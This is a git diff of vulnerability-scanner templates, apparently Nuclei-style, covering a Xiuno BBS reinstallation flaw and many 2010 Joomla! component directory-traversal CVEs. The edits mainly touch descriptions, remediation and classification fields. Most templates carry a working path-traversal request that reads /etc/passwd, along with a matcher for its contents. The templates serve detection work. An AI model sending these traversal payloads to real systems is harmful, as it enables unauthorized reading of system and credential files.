diff --git a/cnvd/2019/CNVD-2019-01348.yaml b/cnvd/2019/CNVD-2019-01348.yaml index b59ca55953..3ba843544c 100644 --- a/cnvd/2019/CNVD-2019-01348.yaml +++ b/cnvd/2019/CNVD-2019-01348.yaml @@ -3,15 +3,15 @@ id: CNVD-2019-01348 info: name: Xiuno BBS CNVD-2019-01348 author: princechaddha - severity: medium - description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page. + severity: high + description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. + remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product. reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 tags: xiuno,cnvd,cnvd2019 - remediation: There is currently no patch available. classification: - cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 6.5 - cwe-id: CWE-276 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index 904655afb1..829aa8ee2e 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml @@ -3,24 +3,24 @@ info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11757 - https://www.cvedetails.com/cve/CVE-2010-1219 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1219 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml index 90c52b2f83..5e511423dd 100644 --- a/cves/2010/CVE-2010-1302.yaml +++ b/cves/2010/CVE-2010-1302.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1302 - info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11978 - https://www.cvedetails.com/cve/CVE-2010-1302 tags: cve,cve2010,joomla,lfi,graph - + classification: + cve-id: CVE-2010-1302 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml index bacd107b78..b1f84a47d8 100644 --- a/cves/2010/CVE-2010-1304.yaml +++ b/cves/2010/CVE-2010-1304.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1304 - info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 tags: cve,cve2010,joomla,lfi,status - + classification: + cve-id: CVE-2010-1304 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml index ca2155a2d3..e91f43a176 100644 --- a/cves/2010/CVE-2010-1305.yaml +++ b/cves/2010/CVE-2010-1305.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1305 - info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12065 - https://www.cvedetails.com/cve/CVE-2010-1305 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1305 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml index 7a3b6a6390..3641751664 100644 --- a/cves/2010/CVE-2010-1306.yaml +++ b/cves/2010/CVE-2010-1306.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1306 - info: name: Joomla! Component Picasa 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12058 - https://www.cvedetails.com/cve/CVE-2010-1306 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1306 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml index 70c1ac485f..633f6e123e 100644 --- a/cves/2010/CVE-2010-1307.yaml +++ b/cves/2010/CVE-2010-1307.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1307 - info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12070 - https://www.cvedetails.com/cve/CVE-2010-1307 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1307 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml index 991bc53f66..b6c51876dc 100644 --- a/cves/2010/CVE-2010-1308.yaml +++ b/cves/2010/CVE-2010-1308.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1308 - info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12066 - https://www.cvedetails.com/cve/CVE-2010-1308 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1308 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml index 022a54afd8..9233b469f2 100644 --- a/cves/2010/CVE-2010-1312.yaml +++ b/cves/2010/CVE-2010-1312.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1312 - info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12077 - https://www.cvedetails.com/cve/CVE-2010-1312 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1312 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml index 46a6e36549..96ae1278d6 100644 --- a/cves/2010/CVE-2010-1313.yaml +++ b/cves/2010/CVE-2010-1313.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1313 - info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12082 - https://www.cvedetails.com/cve/CVE-2010-1313 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1313 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 0d487cfbda..ff7709f567 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1314 - info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12086 - https://www.cvedetails.com/cve/CVE-2010-1314 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1314 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml index 43663eef51..f092a50a5f 100644 --- a/cves/2010/CVE-2010-1315.yaml +++ b/cves/2010/CVE-2010-1315.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1315 - info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/11999 - https://www.cvedetails.com/cve/CVE-2010-1315 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1315 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml index d369a9ddb3..c4118e5a30 100644 --- a/cves/2010/CVE-2010-1340.yaml +++ b/cves/2010/CVE-2010-1340.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1340 - info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/33797 - https://www.cvedetails.com/cve/CVE-2010-1340 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1340 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml index 814e4ab08a..e6b24ac290 100644 --- a/cves/2010/CVE-2010-1345.yaml +++ b/cves/2010/CVE-2010-1345.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1345 - info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/15453 - https://www.cvedetails.com/cve/CVE-2010-1345 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1345 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml index 5dd77fa70f..02a8b12919 100644 --- a/cves/2010/CVE-2010-1352.yaml +++ b/cves/2010/CVE-2010-1352.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1352 - info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12084 - https://www.cvedetails.com/cve/CVE-2010-1352 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1352 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index cde20e6951..ec104f73bf 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml @@ -1,27 +1,26 @@ id: CVE-2010-1353 - info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12068 - https://www.cvedetails.com/cve/CVE-2010-1353 tags: cve,cve2010,joomla,lfi - + classification: + cve-id: CVE-2010-1353 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml index 2b37852cfc..5f15b0d0fd 100644 --- a/cves/2010/CVE-2010-1354.yaml +++ b/cves/2010/CVE-2010-1354.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12102 - https://www.cvedetails.com/cve/CVE-2010-1354 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1354 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml index 1e3d3663a4..4761cca35f 100644 --- a/cves/2010/CVE-2010-1461.yaml +++ b/cves/2010/CVE-2010-1461.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 tags: cve,cve2010,joomla,lfi,photo + classification: + cve-id: CVE-2010-1461 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml index d06c195c18..b0917eaf3e 100644 --- a/cves/2010/CVE-2010-1469.yaml +++ b/cves/2010/CVE-2010-1469.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12146 - https://www.cvedetails.com/cve/CVE-2010-1469 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1469 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml index bcb3e84703..a03a26ef47 100644 --- a/cves/2010/CVE-2010-1470.yaml +++ b/cves/2010/CVE-2010-1470.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1470 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml index b68e50d8b6..6fde5e2454 100644 --- a/cves/2010/CVE-2010-1471.yaml +++ b/cves/2010/CVE-2010-1471.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Address Book 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12170 - https://www.cvedetails.com/cve/CVE-2010-1471 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1471 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml index 4294244baf..4d3b6f55d4 100644 --- a/cves/2010/CVE-2010-1472.yaml +++ b/cves/2010/CVE-2010-1472.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12167 - https://www.cvedetails.com/cve/CVE-2010-1472 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1472 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml index c2e7878067..dba720eb65 100644 --- a/cves/2010/CVE-2010-1473.yaml +++ b/cves/2010/CVE-2010-1473.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12171 - https://www.cvedetails.com/cve/CVE-2010-1473 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1473 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index bad1b8ef59..0aacde798e 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12182 - https://www.cvedetails.com/cve/CVE-2010-1474 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1474 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml index 44a2dd1650..d3dd2ec1d3 100644 --- a/cves/2010/CVE-2010-1475.yaml +++ b/cves/2010/CVE-2010-1475.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12147 - https://www.cvedetails.com/cve/CVE-2010-1475 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1475 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml index c1718acac9..e858a1b0b3 100644 --- a/cves/2010/CVE-2010-1476.yaml +++ b/cves/2010/CVE-2010-1476.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12150 - https://www.cvedetails.com/cve/CVE-2010-1476 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1476 requests: - method: GET path: - 